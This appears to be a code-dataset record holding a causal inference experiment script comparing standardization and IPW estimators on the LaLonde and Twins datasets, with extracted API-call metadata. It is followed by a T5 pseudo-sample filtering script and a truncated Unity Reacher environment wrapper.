('QDA', QuadraticDiscriminantAnalysis(), {}),
# TODO: add tuning of SVM gamma, rather than using the default "scale" setting
('SVM_rbf', SVC(kernel='rbf', probability=True), d_Cs),
('SVM_sigmoid', SVC(kernel='sigmoid', probability=True), d_Cs),
# ('SVM_linear', SVC(kernel='linear', probability=True), d_Cs), # doesn't seem to work (runs forever)
# SVMs are sensitive to input scale
('Standardized_SVM_rbf', Pipeline([('standard', StandardScaler()), (SVM, SVC(kernel='rbf', probability=True))]),
d_Cs_pipeline),
('Standardized_SVM_sigmoid', Pipeline([('standard', StandardScaler()),
(SVM, SVC(kernel='sigmoid', probability=True))]),
d_Cs_pipeline),
# ('Standardized_SVM_linear', Pipeline([('standard', StandardScaler()),
# (SVM, SVC(kernel='linear', probability=True))]),
# d_Cs_pipeline), # doesn't seem to work (runs forever)
('kNN', KNeighborsClassifier(), Ks),
# GaussianProcessClassifier(),
('GaussianNB', GaussianNB(), {}),
# TODO: also cross-validate over min_samples_split and min_samples_leaf
('DecisionTree', DecisionTreeClassifier(), d_max_depths),
# ('RandomForest', RandomForestClassifier(), max_depths),
# TODO: also cross-validate over learning_rate
# ('AdaBoost', AdaBoostClassifier(base_estimator=DecisionTreeClassifier(max_depth=None)), d_max_depths_base),
# ('GradientBoosting', GradientBoostingClassifier(), d_max_depths),
# MLPClassifier(max_iter=1000),
# MLPClassifier(alpha=1, max_iter=1000),
]
psid_gen_model, args = load_from_folder(dataset='lalonde_psid1')
cps_gen_model, args = load_from_folder(dataset='lalonde_cps1')
twins_gen_model, args = load_from_folder(dataset='twins')
psid_ate = psid_gen_model.ate(noisy=True)
psid_ite = psid_gen_model.ite(noisy=True).squeeze()
cps_ate = cps_gen_model.ate(noisy=True)
cps_ite = cps_gen_model.ite(noisy=True).squeeze()
twins_ate = twins_gen_model.ate(noisy=False)
twins_ite = twins_gen_model.ite(noisy=False).squeeze()
GEN_MODELS = [
('lalonde_psid', psid_gen_model, psid_ate, psid_ite),
('lalonde_cps', cps_gen_model, cps_ate, cps_ite),
('twins', twins_gen_model, twins_ate, twins_ite)
]
t_start = time.time()
N_SEEDS_CV = 5
N_SEEDS_METRICS = 5
def run_experiments_for_estimator(get_estimator_func, model_grid, save_location,
meta_est_name, model_type, exclude=[],
gen_models=GEN_MODELS, n_seeds_cv=N_SEEDS_CV,
n_seeds_metrics=N_SEEDS_METRICS):
# if outcome_model_grid is None and prop_score_model_grid is None:
# raise ValueError('Either outcome_model_grid or prop_score_model_grid must be not None.')
# if outcome_model_grid is not None and prop_score_model_grid is not None:
# raise ValueError('Currently only supporting one non-None model grid.')
# outcome_modeling = outcome_model_grid is not None
# model_grid = outcome_model_grid if outcome_modeling else prop_score_model_grid
# model_type = 'outcome' if outcome_modeling else 'prop_score'
valid_model_types = ['outcome', 'prop_score']
if model_type not in valid_model_types:
raise ValueError('Invalid model_type... Valid model_types: {}'.format(valid_model_types))
param_str = 'params_' + model_type + '_model'
dataset_dfs = []
for gen_name, gen_model, ate, ite in gen_models:
print('DATASET:', gen_name)
dataset_start = time.time()
model_dfs = []
for model_name, model, param_grid in model_grid:
print('MODEL:', model_name)
if (gen_name, model_name) in exclude or model_name in exclude:
print('SKIPPING')
continue
model_start = time.time()
results = run_model_cv(gen_model, model, model_name=model_name, param_grid=param_grid,
n_seeds=n_seeds_cv, model_type=model_type, best_model=False, ret_time=False)
metrics_list = []
for params in results[param_str]:
try:
est_start = time.time()
estimator = get_estimator_func(model.set_params(**params))
metrics = calculate_metrics(gen_model, estimator, n_seeds=n_seeds_metrics,
conf_ints=False, ate=ate, ite=ite)
est_end = time.time()
# Add estimator fitting time in minutes
metrics['time'] = (est_end - est_start) / 60
metrics_list.append(metrics)
except ValueError:
print('Skipping {} params: {}'.format(model_name, params))
causal_metrics = pd.DataFrame(metrics_list)
model_df = pd.concat([results, causal_metrics], axis=1)
model_df.insert(0, 'dataset', gen_name)
model_df.insert(1, 'meta-estimator', meta_est_name)
model_dfs.append(model_df)
model_end = time.time()
print(model_name, 'time:', (model_end - model_start) / 60, 'minutes')
dataset_df = pd.concat(model_dfs, axis=0)
dataset_end = time.time()
print(gen_name, 'time:', (dataset_end - dataset_start) / 60 / 60, 'hours')
dataset_dfs.append(dataset_df)
full_df = pd.concat(dataset_dfs, axis=0)
t_end = time.time()
print('Total time elapsed:', (t_end - t_start) / 60 / 60, 'hours')
full_df.to_csv(save_location, float_format='%.2f', index=False)
return full_df
print('STANDARDIZATION')
stand_df = run_experiments_for_estimator(
lambda model: StandardizationEstimator(outcome_model=model),
model_grid=OUTCOME_MODEL_GRID,
save_location=RESULTS_DIR / 'psid_cps_twins_standard.csv',
meta_est_name='standardization',
model_type='outcome',
gen_models=GEN_MODELS)
print('STRATIFIED STANDARDIZATION')
strat_df = run_experiments_for_estimator(
lambda model: StratifiedStandardizationEstimator(outcome_models=model),
model_grid=OUTCOME_MODEL_GRID,
exclude=[('lalonde_cps', 'KernelRidge')],
save_location=RESULTS_DIR / 'psid_cps_twins_strat_standard.csv',
meta_est_name='stratified_standardization',
model_type='outcome',
gen_models=GEN_MODELS)
print('IPW')
ps_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw.csv',
meta_est_name='ipw',
model_type='prop_score',
gen_models=GEN_MODELS)
print('IPW TRIM EPS 0.01')
ps_trim_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model, trim_eps=0.01),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw_trim_01.csv',
meta_est_name='ipw_trimeps.01',
model_type='prop_score',
gen_models=GEN_MODELS)
print('IPW Stabilized weights')
ps_stab_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model, stabilized=True),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw_stabilized.csv',
meta_est_name='ipw_stabilized',
model_type='prop_score',
gen_models=GEN_MODELS)
|
[
"sklearn.preprocessing.StandardScaler",
"numpy.logspace",
"experiments.evaluation.calculate_metrics",
"sklearn.tree.DecisionTreeClassifier",
"loading.load_from_folder",
"pathlib.Path",
"sklearn.svm.SVC",
"sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis",
"causal_estimators.standardization_estimator.StandardizationEstimator",
"pandas.DataFrame",
"warnings.simplefilter",
"sklearn.tree.DecisionTreeRegressor",
"sklearn.linear_model.ElasticNet",
"pandas.concat",
"sklearn.svm.LinearSVR",
"sklearn.linear_model.Lasso",
"sklearn.linear_model.Ridge",
"experiments.evaluation.run_model_cv",
"sklearn.linear_model.LinearRegression",
"sklearn.linear_model.LogisticRegression",
"sklearn.discriminant_analysis.LinearDiscriminantAnalysis",
"causal_estimators.ipw_estimator.IPWEstimator",
"sklearn.svm.SVR",
"sklearn.neighbors.KNeighborsRegressor",
"sklearn.naive_bayes.GaussianNB",
"sklearn.kernel_ridge.KernelRidge",
"time.time",
"causal_estimators.standardization_estimator.StratifiedStandardizationEstimator",
"sklearn.preprocessing.PolynomialFeatures",
"sklearn.neighbors.KNeighborsClassifier"
] |
[((1465, 1536), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'UndefinedMetricWarning'}), "(action='ignore', category=UndefinedMetricWarning)\n", (1486, 1536), False, 'import warnings\n'), ((1754, 1769), 'pathlib.Path', 'Path', (['"""results"""'], {}), "('results')\n", (1758, 1769), False, 'from pathlib import Path\n'), ((1845, 1867), 'numpy.logspace', 'np.logspace', (['(-4)', '(5)', '(10)'], {}), '(-4, 5, 10)\n', (1856, 1867), True, 'import numpy as np\n'), ((6260, 6301), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""lalonde_psid1"""'}), "(dataset='lalonde_psid1')\n", (6276, 6301), False, 'from loading import load_from_folder\n'), ((6324, 6364), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""lalonde_cps1"""'}), "(dataset='lalonde_cps1')\n", (6340, 6364), False, 'from loading import load_from_folder\n'), ((6389, 6422), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""twins"""'}), "(dataset='twins')\n", (6405, 6422), False, 'from loading import load_from_folder\n'), ((6902, 6913), 'time.time', 'time.time', ([], {}), '()\n', (6911, 6913), False, 'import time\n'), ((1790, 1812), 'numpy.logspace', 'np.logspace', (['(-4)', '(5)', '(10)'], {}), '(-4, 5, 10)\n', (1801, 1812), True, 'import numpy as np\n'), ((10030, 10060), 'pandas.concat', 'pd.concat', (['dataset_dfs'], {'axis': '(0)'}), '(dataset_dfs, axis=0)\n', (10039, 10060), True, 'import pandas as pd\n'), ((10074, 10085), 'time.time', 'time.time', ([], {}), '()\n', (10083, 10085), False, 'import time\n'), ((2189, 2207), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2205, 2207), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2605, 2612), 'sklearn.linear_model.Ridge', 'Ridge', ([], {}), '()\n', (2610, 2612), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2637, 2644), 'sklearn.linear_model.Lasso', 'Lasso', ([], {}), '()\n', (2642, 2644), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2674, 2686), 'sklearn.linear_model.ElasticNet', 'ElasticNet', ([], {}), '()\n', (2684, 2686), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2718, 2731), 'sklearn.kernel_ridge.KernelRidge', 'KernelRidge', ([], {}), '()\n', (2729, 2731), False, 'from sklearn.kernel_ridge import KernelRidge\n'), ((2759, 2776), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (2762, 2776), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((2805, 2826), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""sigmoid"""'}), "(kernel='sigmoid')\n", (2808, 2826), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((2853, 2864), 'sklearn.svm.LinearSVR', 'LinearSVR', ([], {}), '()\n', (2862, 2864), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3448, 3469), 'sklearn.neighbors.KNeighborsRegressor', 'KNeighborsRegressor', ([], {}), '()\n', (3467, 3469), False, 'from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n'), ((3609, 3632), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {}), '()\n', (3630, 3632), False, 'from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\n'), ((4086, 4118), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l2"""'}), "(penalty='l2')\n", (4104, 4118), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4154, 4188), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""'}), "(penalty='none')\n", (4172, 4188), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4235, 4287), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l2"""', 'solver': '"""liblinear"""'}), "(penalty='l2', solver='liblinear')\n", (4253, 4287), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4336, 4388), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l1"""', 'solver': '"""liblinear"""'}), "(penalty='l1', solver='liblinear')\n", (4354, 4388), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4432, 4479), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l1"""', 'solver': '"""saga"""'}), "(penalty='l1', solver='saga')\n", (4450, 4479), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4501, 4529), 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis', 'LinearDiscriminantAnalysis', ([], {}), '()\n', (4527, 4529), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4558, 4617), 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis', 'LinearDiscriminantAnalysis', ([], {'solver': '"""lsqr"""', 'shrinkage': '"""auto"""'}), "(solver='lsqr', shrinkage='auto')\n", (4584, 4617), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4636, 4667), 'sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis', 'QuadraticDiscriminantAnalysis', ([], {}), '()\n', (4665, 4667), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4774, 4809), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""', 'probability': '(True)'}), "(kernel='rbf', probability=True)\n", (4777, 4809), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((4838, 4877), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""sigmoid"""', 'probability': '(True)'}), "(kernel='sigmoid', probability=True)\n", (4841, 4877), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5610, 5632), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (5630, 5632), False, 'from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n'), ((5694, 5706), 'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ([], {}), '()\n', (5704, 5706), False, 'from sklearn.naive_bayes import GaussianNB\n'), ((5811, 5835), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (5833, 5835), False, 'from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\n'), ((8169, 8180), 'time.time', 'time.time', ([], {}), '()\n', (8178, 8180), False, 'import time\n'), ((9831, 9859), 'pandas.concat', 'pd.concat', (['model_dfs'], {'axis': '(0)'}), '(model_dfs, axis=0)\n', (9840, 9859), True, 'import pandas as pd\n'), ((9882, 9893), 'time.time', 'time.time', ([], {}), '()\n', (9891, 9893), False, 'import time\n'), ((10331, 10376), 'causal_estimators.standardization_estimator.StandardizationEstimator', 'StandardizationEstimator', ([], {'outcome_model': 'model'}), '(outcome_model=model)\n', (10355, 10376), False, 'from causal_estimators.standardization_estimator import StandardizationEstimator, StratifiedStandardizationEstimator\n'), ((10663, 10719), 'causal_estimators.standardization_estimator.StratifiedStandardizationEstimator', 'StratifiedStandardizationEstimator', ([], {'outcome_models': 'model'}), '(outcome_models=model)\n', (10697, 10719), False, 'from causal_estimators.standardization_estimator import StandardizationEstimator, StratifiedStandardizationEstimator\n'), ((11043, 11079), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model'}), '(prop_score_model=model)\n', (11055, 11079), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((11418, 11469), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model', 'trim_eps': '(0.01)'}), '(prop_score_model=model, trim_eps=0.01)\n', (11430, 11469), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((11832, 11885), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model', 'stabilized': '(True)'}), '(prop_score_model=model, stabilized=True)\n', (11844, 11885), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((2267, 2318), 'sklearn.preprocessing.PolynomialFeatures', 'PolynomialFeatures', ([], {'degree': '(2)', 'interaction_only': '(True)'}), '(degree=2, interaction_only=True)\n', (2285, 2318), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((2339, 2357), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2355, 2357), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2422, 2450), 'sklearn.preprocessing.PolynomialFeatures', 'PolynomialFeatures', ([], {'degree': '(2)'}), '(degree=2)\n', (2440, 2450), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((2452, 2470), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2468, 2470), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((8461, 8472), 'time.time', 'time.time', ([], {}), '()\n', (8470, 8472), False, 'import time\n'), ((8495, 8657), 'experiments.evaluation.run_model_cv', 'run_model_cv', (['gen_model', 'model'], {'model_name': 'model_name', 'param_grid': 'param_grid', 'n_seeds': 'n_seeds_cv', 'model_type': 'model_type', 'best_model': '(False)', 'ret_time': '(False)'}), '(gen_model, model, model_name=model_name, param_grid=param_grid,\n n_seeds=n_seeds_cv, model_type=model_type, best_model=False, ret_time=False\n )\n', (8507, 8657), False, 'from experiments.evaluation import run_model_cv\n'), ((9441, 9467), 'pandas.DataFrame', 'pd.DataFrame', (['metrics_list'], {}), '(metrics_list)\n', (9453, 9467), True, 'import pandas as pd\n'), ((9491, 9535), 'pandas.concat', 'pd.concat', (['[results, causal_metrics]'], {'axis': '(1)'}), '([results, causal_metrics], axis=1)\n', (9500, 9535), True, 'import pandas as pd\n'), ((9715, 9726), 'time.time', 'time.time', ([], {}), '()\n', (9724, 9726), False, 'import time\n'), ((3123, 3139), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3137, 3139), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3148, 3165), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (3151, 3165), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3247, 3263), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3261, 3263), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3272, 3293), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""sigmoid"""'}), "(kernel='sigmoid')\n", (3275, 3293), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3373, 3389), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (3387, 3389), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((3398, 3409), 'sklearn.svm.LinearSVR', 'LinearSVR', ([], {}), '()\n', (3407, 3409), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5087, 5103), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (5101, 5103), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((5112, 5147), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""', 'probability': '(True)'}), "(kernel='rbf', probability=True)\n", (5115, 5147), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5229, 5245), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (5243, 5245), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((5297, 5336), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""sigmoid"""', 'probability': '(True)'}), "(kernel='sigmoid', probability=True)\n", (5300, 5336), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((8813, 8824), 'time.time', 'time.time', ([], {}), '()\n', (8822, 8824), False, 'import time\n'), ((8934, 9038), 'experiments.evaluation.calculate_metrics', 'calculate_metrics', (['gen_model', 'estimator'], {'n_seeds': 'n_seeds_metrics', 'conf_ints': '(False)', 'ate': 'ate', 'ite': 'ite'}), '(gen_model, estimator, n_seeds=n_seeds_metrics, conf_ints=\n False, ate=ate, ite=ite)\n', (8951, 9038), False, 'from experiments.evaluation import calculate_metrics\n'), ((9112, 9123), 'time.time', 'time.time', ([], {}), '()\n', (9121, 9123), False, 'import time\n')]
|
import os
import json
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils as utils
import sys
import argparse
import matplotlib
import pdb
import numpy as np
import time
import random
import re
import time
import matplotlib.pyplot as plt
from tqdm import tqdm
from tqdm import trange
from sklearn import metrics
from torch.utils import data
from collections import Counter
from transformers import AdamW, get_linear_schedule_with_warmup
from transformers import T5Tokenizer, T5ForConditionalGeneration, T5Config
from torch.cuda.amp import autocast as autocast
from torch.cuda.amp import GradScaler as GradScaler
def seed_everything(args):
random.seed(args.seed)
os.environ['PYTHONASSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def ifinclude(str1,str2):
#name.lower() in linelist[0].lower():
str1list = str1.lower().split(' ') ####name
str2list = str2.lower().split(' ') ####linelist
ifin = False
for i in range(0,len(str2list)):
if str2list[i] == str1list[0]:
ifin = True
for j in range(1,len(str1list)):
if str2list[i+j] != str1list[j]:
ifin = False
break
if ifin == True:
break
else:
continue
return ifin
def handlefile(inputfile,outputfile,allnumber,trainnumber):
f = open(inputfile,'r')
allres = {}
alltype = []
for key in allnumber.keys():
alltype.append(key)
insen = 0
allin = {}
notinsen = 0
allnotin = {}
while True:
line = f.readline().strip()
if not line:
break
linelist = line.split("__ans__")
if len(linelist) != 2:
continue
entitylist = linelist[1]
if entitylist == 'end':
continue
if ';' not in entitylist:
continue
allentity = entitylist.split(";")
if len(allentity) != 2:
continue
firstentity = allentity[0]
#print(firstentity)
if '!' not in firstentity:
continue
splitent = firstentity.split('!')
if len(splitent) != 2:
continue
thistype = splitent[1].strip()
#print(thistype)
if thistype not in alltype:
continue
#print(linelist[0] + '\t' + linelist[1])
name = linelist[1].split(";")[0].split("!")[0].strip(' ')
entype = linelist[1].split(";")[0].split("!")[1].strip(' ')
whole = name + " ! " + entype + " ;"
#print(name)
#####some filters
thissen = linelist[0]
####length
# senlist = thissen.split(' ')
# if len(senlist) <= 3:
# continue
# digitnum = 0
# for one in senlist:
# if re.search(r'\d', one):
# digitnum += 1
# if len(senlist) - digitnum < 1:
# continue
#ifin = ifinclude(name,linelist[0])
#if ifin:
if name.lower() in linelist[0].lower():
length = len(name)
startindex = linelist[0].lower().find(name.lower())
endindex = startindex + length
toreplace = linelist[0][startindex:endindex]
#newsen = linelist[0]
newsen = linelist[0].replace(toreplace,name)
if thistype not in allin:
#allin[thistype] = [linelist[0] + '\t' + linelist[1]]
allin[thistype] = {}
if whole not in allin[thistype]:
insen += 1
allin[thistype][whole] = [newsen]
#else:
# allin[thistype][whole].append(linelist[0])
else:
#allin[thistype].append(linelist[0] + '\t' + linelist[1])
if whole not in allin[thistype]:
insen += 1
allin[thistype][whole] = [newsen]
#else:
# allin[thistype][whole].append(linelist[0])
else:
########some filter
##ensure the entity has similar words in sen
# if name.lower() in linelist[0].lower():
# ###thisone will be used
# str1list = name.lower().split(' ') ####name
# nolowlist = name.split(' ')
# str2list = linelist[0].lower().split(' ') ####linelist
# ifin = False
# touselist = linelist[0].split(' ')
# for i in range(0, len(str2list)):
# if str1list[0] in str2list[i]:
# touselist[i] = nolowlist[0]
# for j in range(1,len(str1list)):
# touselist[i+j] = nolowlist[j]
# else:
# continue
# newsen = ' '.join(touselist)
# else:
# ####whether first similar 0.75 5
# str1list = name.lower().split(' ')
# tousestr = str1list[0]
# str2list = linelist[0].lower().split(' ')
# ifhave = 0
# index = -1
# for j in range(0,len(str2list)):
# thistoken = str2list[j]
# samenum = 0
# for k in range(min(len(tousestr),len(thistoken))):
# if tousestr[k] == thistoken[k]:
# samenum += 1
# else:
# break
# if min(len(tousestr),len(thistoken)) == 0:
# continue
# if samenum >= 5 or float(samenum) / float(min(len(tousestr),len(thistoken))) >= 0.75:
# ifhave = 1
# index = j
# break
# if not ifhave:
# continue
# else:
# ###replace
# newlinelist = linelist[0].split()[0:index] + name.split(' ') + linelist[0].split()[index+1:]
# newsen = " ".join(newlinelist)
if thistype not in allnotin:
#allnotin[thistype] = [linelist[0] + '\t' + linelist[1]]
allnotin[thistype] = {}
if whole not in allnotin[thistype]:
notinsen += 1
newsen = linelist[0] + " " + name
allnotin[thistype][whole] = [newsen]
#else:
# allnotin[thistype][whole].append(linelist[0])
else:
#allnotin[thistype].append(linelist[0] + '\t' + linelist[1])
if whole not in allnotin[thistype]:
notinsen += 1
newsen = linelist[0] + " " + name
allnotin[thistype][whole] = [newsen]
#else:
# allnotin[thistype][whole].append(linelist[0])
f.close()
print(insen)
print(notinsen)
# for key in allin:
# print(key+"\t"+str(len(allin[key])))
# for key in allnotin:
# print(key+"\t"+str(len(allnotin[key])))
# for key in allin:
# for one in allin[key]:
# for aa in allin[key][one]:
# print(aa+" "+one)
# for key in allnotin:
# for one in allnotin[key]:
# for aa in allnotin[key][one]:
# print(aa + " " + one)
finalres = {}
fall = open("allgenerate",'w')
for key in allnumber.keys():
finalres[key] = []
for key in allin:
for one in allin[key]:
for aa in allin[key][one]:
finalres[key].append(aa+"\t"+one)
fall.write(aa+"\t"+one+'\n')
for key in allnotin:
for one in allnotin[key]:
for aa in allnotin[key][one]:
finalres[key].append(aa+"\t"+one)
fall.write(aa + "\t" + one + '\n')
fall.close()
#for key in finalres.keys():
# print(len(finalres[key]))
sampleres = []
trainres = []
validres = []
for key in finalres.keys():
thissample = random.sample(finalres[key],allnumber[key])
#print(thissample)
sampleres.extend(thissample)
####divide to train and valid
thistrainnum = trainnumber[key]
indexlist = [i for i in range(allnumber[key])]
#print(indexlist)
trainuse = random.sample(indexlist,thistrainnum)
#print(trainuse)
for j in range(allnumber[key]):
if j in trainuse:
trainres.append(thissample[j])
else:
validres.append(thissample[j])
#print(trainres)
#print(validres)
#print(sampleres)
fo = open(outputfile, 'w')
for one in sampleres:
fo.write(one+"\n")
fo.close()
fot = open('train_mem.txt', 'w')
for one in trainres:
fot.write(one+"\n")
fot.close()
fov = open('valid_mem.txt', 'w')
for one in validres:
fov.write(one + "\n")
fov.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="latentRE")
parser.add_argument("--model", dest="model", type=str,
default="T5", help="{T5}")
parser.add_argument("--seed", dest="seed", type=int,
default=160, help="seed for network")
args = parser.parse_args()
seed_everything(args)
if args.model == "T5":
#seed 100
#train: person:10 location:12 org:6 mix:7
#valid: person:16 location:12 org:11 mix:8
print("right!")
# allnumber = {'org': 17, 'location': 24, 'person': 26, 'mix': 15}
# trainnumber = {'org': 6, 'location': 12, 'person': 10, 'mix': 7}
# allnumber = {'org':15,'location':14,'person':11,'mix':9}
# trainnumber = {'org':7,'location':8,'person':5,'mix':4}
allnumber = {'org': 16, 'location': 21, 'person': 20, 'mix': 16}
trainnumber = {'org': 7, 'location': 10, 'person': 11, 'mix': 6}
handlefile("pseudosamples", "allselect", allnumber, trainnumber)
else:
raise Exception("No such model! Please make sure that `model` takes the value in {T5}")
|
[
"numpy.random.seed",
"argparse.ArgumentParser",
"random.sample",
"torch.manual_seed",
"torch.cuda.manual_seed",
"random.seed"
] |
[((674, 696), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (685, 696), False, 'import random\n'), ((749, 774), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (763, 774), True, 'import numpy as np\n'), ((779, 807), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (796, 807), False, 'import torch\n'), ((812, 845), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.seed'], {}), '(args.seed)\n', (834, 845), False, 'import torch\n'), ((9238, 9285), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""latentRE"""'}), "(description='latentRE')\n", (9261, 9285), False, 'import argparse\n'), ((8280, 8324), 'random.sample', 'random.sample', (['finalres[key]', 'allnumber[key]'], {}), '(finalres[key], allnumber[key])\n', (8293, 8324), False, 'import random\n'), ((8566, 8604), 'random.sample', 'random.sample', (['indexlist', 'thistrainnum'], {}), '(indexlist, thistrainnum)\n', (8579, 8604), False, 'import random\n')]
|
import numpy as np
import torch
class UnityEnv():
"""Unity Reacher Environment Wrapper
https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Learning-Environment-Examples.md
"""
def __init__(self, env_file='data/Reacher.exe', no_graphics=True, mlagents=False):
if mlagents:
from mlagents.envs.environment import UnityEnvironment
else:
from unityagents import UnityEnvironment
self.env = UnityEnvironment(file_name=env_file, no_graphics=no_graphics)
self.brain_name = self.env.brain_names[0]
brain = self.env.brains[self.brain_name]
self.action_size = brain.vector_action_space_size
if type(self.action_size) != int:
self.action_size = self.action_size[0]
env_info = self.env.reset(train_mode=True)[self.brain_name]
self.state_size = env_info.vector_observations.shape[1]
self.num_agents = len(env_info.agents)
def reset(self, train=True):
